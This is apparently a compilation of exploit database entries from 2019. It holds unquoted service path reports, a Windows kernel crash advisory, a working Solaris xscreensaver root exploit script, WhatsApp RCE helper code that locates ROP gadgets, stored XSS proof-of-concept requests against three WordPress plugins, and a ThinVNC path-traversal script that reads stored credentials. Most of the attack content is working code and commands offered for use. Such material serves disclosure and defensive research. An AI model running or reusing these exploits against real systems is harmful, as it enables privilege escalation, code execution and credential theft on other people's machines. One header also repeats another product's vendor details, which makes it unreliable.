# Exploit Title: National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation # Discovery Date: 2019-10-10 # Exploit Author: Ivan Marmolejo # Vendor Homepage: http://www.ni.com/en-us.html # Software Link: https://www.ni.com/en-us/shop/select/circuit-design-suite # Version: 14.0 # Vulnerability Type: Local # Tested on: Windows 10 Pro x64 Esp # Version: 10.0.18362 # Exploit.txt ############################################################################################################################################## Summary: Circuit Design Suite combines Multisim and Ultiboard software to offer a complete set of tools for circuit design,simulation, validation and design. Circuit Design Suite helps you design circuits with intuitive and cost-effective tools. You can perform an interactive SPICE simulation and make a perfect transition to PCB design and routing software. Built for education, research and design, the suite offers advanced simulation capabilities to give you a clear view of how circuits perform in any situation. Description: The application suffers from an unquoted search path issue impacting the service 'NiSvcLoc'. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application. ############################################################################################################################################## Step to discover the unquoted Service: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ NI Service Locator NiSvcLoc C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s Auto ############################################################################################################################################## Service info: C:\Users\user>sc qc NiSvcLoc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: NiSvcLoc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : NI Service Locator DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem ##############################################################################################################################################

We have encountered a Windows kernel crash in memcpy() called by nt!MiRelocateImage while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF8017519A200,0x0000000000000000,0xFFFFF801713CF660,0x0000000000000000) A fatal system error has occurred. [...] ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff8017519a200, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff801713cf660, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: ffffc50241846ba0 -- (.trap 0xffffc50241846ba0) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=ffffcf84d2228de0 rbx=0000000000000000 rcx=ffffcf84d2228fb8 rdx=0000287ca2f71248 rsi=0000000000000000 rdi=0000000000000000 rip=fffff801713cf660 rsp=ffffc50241846d38 rbp=ffffc50241846fb0 r8=000000000000000c r9=0000000000000001 r10=00000000ffffffff r11=ffffcf84d2228fb8 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na pe cy nt!memcpy+0x20: fffff801`713cf660 488b0411 mov rax,qword ptr [rcx+rdx] ds:fffff801`7519a200=???????????????? Resetting default scope LAST_CONTROL_TRANSFER: from fffff801714a6642 to fffff801713c46a0 STACK_TEXT: ffffc502`41846158 fffff801`714a6642 : fffff801`7519a200 00000000`00000003 ffffc502`418462c0 fffff801`71322be0 : nt!DbgBreakPointWithStatus ffffc502`41846160 fffff801`714a5d32 : fffff801`00000003 ffffc502`418462c0 fffff801`713d0f60 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12 ffffc502`418461c0 fffff801`713bca07 : ffffce67`3399cf80 fffff801`714d0110 00000000`00000000 fffff801`71663900 : nt!KeBugCheck2+0x952 ffffc502`418468c0 fffff801`713e0161 : 00000000`00000050 fffff801`7519a200 00000000`00000000 ffffc502`41846ba0 : nt!KeBugCheckEx+0x107 ffffc502`41846900 fffff801`7127aaef : 00000000`00000000 00000000`00000000 00000000`00000000 fffff801`7519a200 : nt!MiSystemFault+0x1d3171 ffffc502`41846a00 fffff801`713ca920 : ffffcf84`cb274000 fffff801`713c79e5 00000000`00000000 fffff801`751a0c00 : nt!MmAccessFault+0x34f ffffc502`41846ba0 fffff801`713cf660 : fffff801`7188246d 00000000`6cc30000 ffffc502`41846fb0 ffffcf84`d2228d70 : nt!KiPageFault+0x360 ffffc502`41846d38 fffff801`7188246d : 00000000`6cc30000 ffffc502`41846fb0 ffffcf84`d2228d70 00000000`00000000 : nt!memcpy+0x20 ffffc502`41846d40 fffff801`717fc8a3 : ffffc502`41847180 ffffc502`41847180 ffffc502`41846fb0 ffffc502`41847180 : nt!MiRelocateImage+0x3dd ffffc502`41846eb0 fffff801`717dca20 : ffff9d05`96f58160 ffffc502`41847180 ffffc502`41847180 ffff9d05`96f58130 : nt!MiCreateNewSection+0x5ef ffffc502`41847010 fffff801`717dcd24 : ffffc502`41847040 ffffcf84`d24b8b00 ffff9d05`96f58160 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 ffffc502`41847100 fffff801`717dc37f : 00000000`11000000 ffffc502`418474c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 ffffc502`41847280 fffff801`717dc110 : 00000000`0828cf48 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff ffffc502`41847360 fffff801`713ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60 ffffc502`418473d0 00007ffb`a3edc9a4 : 00007ffb`a1c71ae7 00000000`00000000 00000000`00000001 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 00000000`0828ced8 00007ffb`a1c71ae7 : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00000000 : ntdll!NtCreateSection+0x14 00000000`0828cee0 00007ffb`a1c75640 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 00000000`0828d110 00007ffb`a1c5c41d : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 00000000`0828d180 00007ffb`a22603d1 : 00000000`055c1640 00000000`00000000 00006d1c`2a8cc01b 00007ffb`a29c643e : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 00000000`0828d1e0 00007ffb`a226035c : 00000000`00002234 00007ffb`a29cdba3 00000000`00002234 00000000`00000000 : SHELL32!_LoadVersionInfo+0x39 00000000`0828d250 00007ffb`a155c1c1 : 00000000`00000000 00000000`00000000 00000000`00000020 00000000`40040000 : SHELL32!CVersionPropertyStore::Initialize+0x2c [...] --- cut --- The issue reproduces on Windows 8.1, Windows 10 and their corresponding Server editions (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as an information disclosure primitive. We haven't managed to significantly minimize the test cases, but we determined that the crash is related to the invalid value of the Base Relocation Table directory address in the PE headers. Attached is an archive with two proof-of-concept PE images and the corresponding original files used to generate them. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47489.zip

# Exploit Title : LiteManager 4.5.0 - 'romservice' Unquoted Serive Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor: LiteManager Team # Version : LiteManager 4.5.0 # Software: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support # Tested on Windows 10 # CVE : N/A c:\>sc qc romservice [SC] QueryServiceConfig SUCCESS SERVICE_NAME: romservice TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\LiteManagerFree - Server\ROMServer.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : LiteManagerTeam LiteManager DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title : Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor: LiteManager Team # Version : LiteManager 4.5.0 # Software: http://html.tucows.com/preview/518015/Mikogo?q=remote+support # Tested on Windows 10 # CVE : N/A c:\>sc qc Mikogo-Service [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Mikogo-Service TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\Administrator\AppData\Roaming\Mikogo\Mikogo-Service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Mikogo-Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: Solaris xscreensaver 11.4 - Privilege Escalation # Date: 2019-10-16 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.oracle.com/technetwork/server-storage/solaris11/ # Version: Solaris 11.x # Tested on: Solaris 11.4 and 11.3 X86 # CVE: N/A #!/bin/sh # # raptor_xscreensaver - Solaris 11.x LPE via xscreensaver # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> # # Exploitation of a design error vulnerability in xscreensaver, as # distributed with Solaris 11.x, allows local attackers to create # (or append to) arbitrary files on the system, by abusing the -log # command line switch introduced in version 5.06. This flaw can be # leveraged to cause a denial of service condition or to escalate # privileges to root. This is a Solaris-specific vulnerability, # caused by the fact that Oracle maintains a slightly different # codebase from the upstream one (CVE-2019-3010). # # "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs # "Good hackers force luck." -- ~A. # # This exploit targets the /usr/lib/secure/ directory in order # to escalate privileges with the LD_PRELOAD technique. The # implementation of other exploitation vectors, including those # that do not require gcc to be present on the target system, is # left as an exercise to fellow UNIX hackers;) # # Usage: # raptor@stalker:~$ chmod +x raptor_xscreensaver # raptor@stalker:~$ ./raptor_xscreensaver # [...] # Oracle Corporation SunOS 5.11 11.4 Aug 2018 # root@stalker:~# id # uid=0(root) gid=0(root) # root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.* # # Vulnerable platforms: # Oracle Solaris 11 X86 [tested on 11.4 and 11.3] # Oracle Solaris 11 SPARC [untested] # echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver" echo "Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>" echo # prepare the payload echo "int getuid(){return 0;}" > /tmp/getuid.c gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc if [ $? -ne 0 ]; then echo "error: problem compiling the shared library, check your gcc" exit 1 fi # check the architecture LOG=/usr/lib/secure/getuid.so file /bin/su | grep 64-bit >/dev/null 2>&1 if [ $? -eq 0 ]; then LOG=/usr/lib/secure/64/getuid.so fi # start our own xserver # alternatively we can connect back to a valid xserver (e.g. xquartz) /usr/bin/Xorg :1 & # trigger the bug umask 0 /usr/bin/xscreensaver -display :1 -log $LOG & sleep 5 # clean up pkill -n xscreensaver pkill -n Xorg # LD_PRELOAD-fu cp /tmp/getuid.so $LOG LD_PRELOAD=$LOG su -

# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution # Date: 2019-10-16 # Exploit Author: Valerio Brussani (@val_brux) # Vendor Homepage: https://www.whatsapp.com/ # Version: < 2.19.244 # Tested on: Whatsapp 2.19.216 # CVE: CVE-2019-11932 # Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/ # Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp # Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/) /* * * Introduction * This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability. * The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp * */ #include <jni.h> #include <string> #include <dlfcn.h> #include <link.h> typedef uint8_t byte; char *gadget_p; void* libc,* lib; //dls iteration for rop int dl_callback(struct dl_phdr_info *info, size_t size, void *data) { int j; const char *base = (const char *)info->dlpi_addr; for (j = 0; j < info->dlpi_phnum; j++) { const ElfW(Phdr) *phdr = &info->dlpi_phdr[j]; if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) { gadget_p = (char *) base + phdr->p_vaddr; return 1; } } return 0; } //system address void* get_system_address(){ libc = dlopen("libc.so",RTLD_GLOBAL); void* address = dlsym( libc, "system"); return address; } //rop gadget address void get_gadget_lib_base_address() { lib = dlopen("libhwui.so",RTLD_GLOBAL); dl_iterate_phdr(dl_callback, NULL); } //search gadget long search_for_gadget_offset() { char *buffer; long filelen; char curChar; long pos = 0; int curSearch = 0; //reading file FILE* fd = fopen("/system/lib64/libhwui.so","rb"); fseek(fd, 0, SEEK_END); filelen = ftell(fd); rewind(fd); buffer = (char *)malloc((filelen+1)*sizeof(char)); fread(buffer, filelen, 1, fd); fclose(fd); //searching for bytes byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6}; while(pos <= filelen){ curChar = buffer[pos];pos++; if(curChar == g1[curSearch]){ curSearch++; if(curSearch > 11){ curSearch = 0; pos-=12; break; } } else{ curSearch = 0; } } return pos; } extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) { char buff[30]; //system address snprintf(buff, sizeof(buff), "%p", get_system_address()); dlclose(libc); std::string system_string = buff; return env->NewStringUTF(system_string.c_str()); } extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) { char buff[30]; get_gadget_lib_base_address(); //gadget address snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset()); dlclose(lib); std::string system_string = buff; return env->NewStringUTF(system_string.c_str()); }

# Exploit Title: Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting # Google Dork: inurl:"\wp-content\plugins\foogallery" # Date: 2019-06-13 # Exploit Author: Unk9vvN # Vendor Homepage: https://foo.gallery/ # Software Link: https://wordpress.org/plugins/foogallery/ # Version: 1.8.12 # Tested on: Kali Linux # CVE: N/A # Description # This vulnerability is in the validation mode and is located in the plugin settings panel and the vulnerability type is stored ,it happend becuse in setting is an select tag ,this select tag have option with value of title gallerys so simply we just have to break option and write our script tag the vulnerability parameters are as follows. 1.Go to the 'add Gallery' of FooGallery 2.Enter the payload in the "add Title" 3.Click the "Publish" option 4.Go to plugin setting of FooGallery 5.Your payload will run # URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true # Parameter & Payoad: post_title="/><script>alert("Unk9vvn")</script> # # POC # POST /wordpress/wp-admin/post.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true Content-Type: application/x-www-form-urlencoded Content-Length: 2694 Cookie: ...... Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 _wpnonce=933471aa43&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dfoogallery&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=foogallery&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&auto_draft=&post_ID=32&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvn%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=14&mn=42&ss=45&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=14&cur_hh=14&hidden_mn=42&cur_mn=42&original_publish=Publish&publish=Publish&foogallery_sort=&foogallery_clear_gallery_thumb_cache_nonce=e18d32a542&_thumbnail_id=-1&_foogallery_settings%5Bfoogallery_items_view%5D=manage&foogallery_nonce=b6066e6407&foogallery_attachments=&foogallery_preview=e35a011572&foogallery_template=default&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bwidth%5D=150&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bheight%5D=150&_foogallery_settings%5Bdefault_thumbnail_link%5D=image&_foogallery_settings%5Bdefault_lightbox%5D=none&_foogallery_settings%5Bdefault_spacing%5D=fg-gutter-10&_foogallery_settings%5Bdefault_alignment%5D=fg-center&_foogallery_settings%5Bdefault_theme%5D=fg-light&_foogallery_settings%5Bdefault_border_size%5D=fg-border-thin&_foogallery_settings%5Bdefault_rounded_corners%5D=&_foogallery_settings%5Bdefault_drop_shadow%5D=fg-shadow-outline&_foogallery_settings%5Bdefault_inner_shadow%5D=&_foogallery_settings%5Bdefault_loading_icon%5D=fg-loading-default&_foogallery_settings%5Bdefault_loaded_effect%5D=fg-loaded-fade-in&_foogallery_settings%5Bdefault_hover_effect_color%5D=&_foogallery_settings%5Bdefault_hover_effect_scale%5D=&_foogallery_settings%5Bdefault_hover_effect_caption_visibility%5D=fg-caption-hover&_foogallery_settings%5Bdefault_hover_effect_transition%5D=fg-hover-fade&_foogallery_settings%5Bdefault_hover_effect_icon%5D=fg-hover-zoom&_foogallery_settings%5Bdefault_caption_title_source%5D=&_foogallery_settings%5Bdefault_caption_desc_source%5D=&_foogallery_settings%5Bdefault_captions_limit_length%5D=&_foogallery_settings%5Bdefault_paging_type%5D=&_foogallery_settings%5Bdefault_custom_settings%5D=&_foogallery_settings%5Bdefault_custom_attributes%5D=&_foogallery_settings%5Bdefault_lazyload%5D=&post_name=&foogallery_custom_css=

# Exploit Title: Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting # Google Dork: inurl:"\wp-content\plugins\soliloquy-lite" # Date: 2019-06-13 # Exploit Author: Unk9vvN # Vendor Homepage: https://soliloquywp.com/ # Software Link: https://wordpress.org/plugins/soliloquy-lite/ # Version: 2.5.6 # Tested on: Kali Linux # CVE: N/A # Description # This vulnerability is in the validation mode and is located in the Prevew of new post inside soliloquy and the vulnerability type is stored ,it happend when a user insert script tag in title input then save the post. everything will be ok until target click on preview of vulnerabil. 1.Go to the 'Add new' section of soliloquy 2.Enter the payload in the "add Title" 3.Select a sample image 4.Click the "Publish" option 5.Click on Preview 6.Your payload will run # URI: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit # Parameter & Payoad: post_title=&#47;"><script>alert("Unk9vvN")<&#47;script> # # POC # POST /wordpress/wp-admin/post.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit Content-Type: application/x-www-form-urlencoded Content-Length: 1599 Cookie: ....... Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 _wpnonce=d9f78b76e2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=soliloquy&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&post_ID=50&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&_soliloquy%5Btype%5D=default&async-upload=&post_id=50&soliloquy=bdfd10296c&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&_soliloquy%5Btype_default%5D=1&_soliloquy%5Bslider_theme%5D=base&_soliloquy%5Bslider_width%5D=960&_soliloquy%5Bslider_height%5D=300&_soliloquy%5Btransition%5D=fade&_soliloquy%5Bduration%5D=5000&_soliloquy%5Bspeed%5D=400&_soliloquy%5Bgutter%5D=20&_soliloquy%5Bslider%5D=1&_soliloquy%5Baria_live%5D=polite&_soliloquy%5Btitle%5D=%2F%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&_soliloquy%5Bslug%5D=scriptalert1script&_soliloquy%5Bclasses%5D=&wp-preview=dopreview&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=21&ss=21&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=21&cur_mn=21&original_publish=Update

# Exploit Title: Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting # Google Dork: inurl:"\wp-content\plugins\popupbuilder" # Date: 2019-06-13 # Exploit Author: Unk9vvN # Vendor Homepage: https://popup-builder.com/ # Software Link: https://wordpress.org/plugins/popup-builder/ # Version: 3.49 # Tested on: Kali Linux # CVE: N/A # Description # This vulnerability is in the validation mode and is located in "Add Post" or "Add Page" of wordpress and the vulnerability type is stored ,after install Popup Builder it will make section in Add Post and Add Page . in this section you will choose which popup show it will create option tag with value of title of the popups, now its easy we just break option tag and insert our script tag inside popup title. 1.Go to the 'Add new' section of Popup Builder 2.Select Image type 3.Enter the payload in the "add Title" 4.Click the "Publish" option 5.Go to Add New of Page section or Add New of Post section 6.Your payload will run # URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=popupbuilder&sgpb_type=image&wp-post-new-reload=true # Parameter & Payoad: post_title="/><script>alert("Unk9vvN")</script> # # POC # POST /wordpress/wp-admin/post.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/post.php?post=39&action=edit Content-Type: application/x-www-form-urlencoded Content-Length: 2425 Cookie: ...... Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 _wpnonce=8dde4c5262&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=popupbuilder&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&post_ID=39&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=01&ss=34&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=01&cur_mn=03&original_publish=Update&save=Update&tax_input%5Bpopup-categories%5D%5B%5D=0&newpopup-categories=New+Category+Name&newpopup-categories_parent=-1&_ajax_nonce-add-popup-categories=11ba2a6f5c&sgpb-image-url=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-content%2Fuploads%2F2019%2F09%2Fwp2601087.jpg&sgpb-target%5B0%5D%5B0%5D%5Bparam%5D=not_rule&sgpb-type=image&sgpb-is-preview=0&sgpb-is-active=checked&sgpb-events%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bparam%5D=select_event&sgpb-popup-z-index=9999&sgpb-popup-themes=sgpb-theme-1&sgpb-overlay-custom-class=sgpb-popup-overlay&sgpb-overlay-color=&sgpb-overlay-opacity=0.8&sgpb-content-custom-class=sg-popup-content&sgpb-esc-key=on&sgpb-enable-close-button=on&sgpb-close-button-delay=0&sgpb-close-button-position=bottomRight&sgpb-button-position-top=&sgpb-button-position-right=9&sgpb-button-position-bottom=9&sgpb-button-position-left=&sgpb-button-image=&sgpb-button-image-width=21&sgpb-button-image-height=21&sgpb-border-color=%23000000&sgpb-border-radius=0&sgpb-border-radius-type=%25&sgpb-button-text=Close&sgpb-overlay-click=on&sgpb-popup-dimension-mode=responsiveMode&sgpb-responsive-dimension-measure=auto&sgpb-width=640px&sgpb-height=480px&sgpb-max-width=&sgpb-max-height=&sgpb-min-width=120&sgpb-min-height=&sgpb-open-animation-effect=No+effect&sgpb-close-animation-effect=No+effect&sgpb-enable-content-scrolling=on&sgpb-popup-order=0&sgpb-popup-delay=0&post_name=scriptalert1script

# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass # Date: 2019-10-17 # Exploit Author: Nikhith Tumamlapalli # Contributor WarMarX # Vendor Homepage: https://sourceforge.net/projects/thinvnc/ # Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download # Version: 1.0b1 # Tested on: Windows All Platforms # CVE : CVE-2019-17662 # Description: # Authentication Bypass via Arbitrary File Read #!/usr/bin/python3 import sys import os import requests def exploit(host,port): url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini" r = requests.get(url) body = r.text print(body.splitlines()[2]) print(body.splitlines()[3]) def main(): if(len(sys.argv)!=3): print("Usage:\n{} <host> <port>\n".format(sys.argv[0])) print("Example:\n{} 192.168.0.10 5888") else: port = sys.argv[2] host = sys.argv[1] exploit(host,port) if __name__ == '__main__': main()

# Exploit Title: Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path # Exploit Author: Debashis Pal # Date: 2019-10-17 # Vendor Homepage : https://webcompanion.com # Source: https://webcompanion.com # Version: Web Companion versions 5.1.1035.1047 # CVE : N/A # Tested on: Windows 7 SP1(64bit) 1. Description: Web Companion versions 5.1.1035.1047 service 'WCAssistantService' have an unquoted service path. 2. PoC: C:\>sc qc WCAssistantService sc qc WCAssistantService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: WCAssistantService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : WC Assistant DEPENDENCIES : SERVICE_START_NAME : LocalSystem 3. Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. # Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

